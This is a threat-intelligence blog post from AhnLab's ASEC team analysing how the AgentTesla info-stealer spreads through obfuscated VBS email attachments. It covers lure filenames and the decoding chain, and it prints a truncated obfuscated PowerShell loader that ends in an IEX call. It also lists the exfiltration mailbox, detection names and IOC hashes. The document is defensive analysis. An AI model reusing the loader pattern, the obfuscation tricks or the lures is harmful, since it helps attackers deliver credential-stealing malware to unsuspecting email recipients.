AgentTesla Being Distributed via VBS – ASEC BLOG

The ASEC analysis team has recently identified that AgentTesla is being distributed through malicious VBS. The script file has multiple codes that have been obfuscated multiple times. AgentTesla has been found to be distributed last May through a Windows Help file (*.chm), and it seems that its distribution method is continuously changing.

The VBS script is distributed as an attachment to emails. Recently, emails impersonating those from Korean corporations have also been identified.

Distributed email

The compressed file contains the VBS, and commonly used filenames include invoices and proposals. The confirmed filenames are as follows:

Date Filename
10/05 doc_10049500220529464169750.pdf.vbs
10/07 doc_5246701207754814333490.vbs
10/12 № 106 – Supply of Flex.vbs
protected copy of the commercial invoice.vbs
10/12 LJUR900225565_pdf.vbs
10/13 770140578183.CL.NoticeOfArrival.vbs
10/15 Urgent RFQ No.6554342.vbs
10/17 JKTR002014953_5101075053_ppwk.vbs
10/17 Order List(Draft) 9419-PDF.vbs
10/18 BESOLO.vbs
10/21 BEST SOLU.vbs
Confirmed filenames

The confirmed VBS files contain multiple annotations and dummy codes.

Confirmed VBS file

Aside from the multiple annotations and dummy codes, there is a code at the bottom responsible for reading the strings in the currently running VBS file excluding every 2 characters

Code inside the VBS

When this code is executed, the strings that were in the annotations are decoded and a new script code is executed. The decoded code includes an obfuscated shellcode and an additional PowerShell command.

Decoded VBS code

When the above script code is executed, the value of ‘Ch8’, an obfuscated shellcode, is saved to HKCUSoftwareBasilicae17Vegetates.

Value saved to the registry

Afterward, the value of the ‘O9’ variable is executed through PowerShell. The ‘O9’ variable contains a PowerShell command, and the executed command is obfuscated as shown below.

powershell.exe  “$Quegh = “””DatFMaruBidnMescFultkariStaoPtenKol EftHStaTBesBCel Uer{Taw fem Las Ude UndpLawaDokrSlaaQuamAsi(Uhj[DagSBontUnbrSkaiTilnHalgTis]Fes`$LivHPerSWir)Con;Fat Ret Hjl Amp Aft`$IntBLavySaltfaseBinsEno Che=Sax CenNDvdeDoswCyp-VovOShab <ommited> Ind5Nin3Ree#Apo;”””;;
Function Tammy159 { param([String]$HS);  For($i=3; $i -lt $HS.Length-1; $i+=(3+1)){ $Statice = $Statice + $HS.Substring($i, 1);   }    $Statice;}
$Ambulancetjeneste1820 = Tammy159 ‘UnsIPujEFolXInt ‘;
$Ambulancetjeneste1821= Tammy159 $Quegh;
& ($Ambulancetjeneste1820) $Ambulancetjeneste1821;;
PowerShell command that is executed

The PowerShell code decodes the obfuscated value saved on the ‘$Quegh’ variable by excluding every 3 characters. (ex.  UnsIPujEFolXInt -> IEX)
The decoded command is also obfuscated, and the code that is ultimately executed is as follows.

The PowerShell command that is executed ultimately

The obfuscated shellcode that was saved before in HKCUSoftwareBasilicae17Vegetates is decoded in base64 and executed. The executed shellcode injects the AgentTesla malware into CasPol.exe, a normal process. AgentTesla is an info-stealer that collects user PC information, compresses it into CO_[username]/[PC name].zip and leaks it via email.

The email information used is as follows.

  • From : hasan@edp-bkv.com
  • To : kingpentecost22@gmail.com
  • pw : Fb56****65fr
Leaked information

AgentTesla is malware that is also prevalent in weekly statistics, and its distribution method is continuously changing. Also, caution is advised because a variety of malware can be executed aside from AgentTesla according to the shellcode.

[File Detection]
Dropper/VBS.Generic
Downloader/VBS.Powershell
Trojan/VBS.Agent
Trojan/VBS.Obfuscated

[IOC]
7fe2ed92d9306c8f0843cbb4a38f88e0
b06081daa9bc002cd750efb65e1e932e
eccef74de61f20a212ecbb4ead636f73
ea202427fbe14d9a6d808b9ee911f68c

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Source: https://asec.ahnlab.com/en/40890/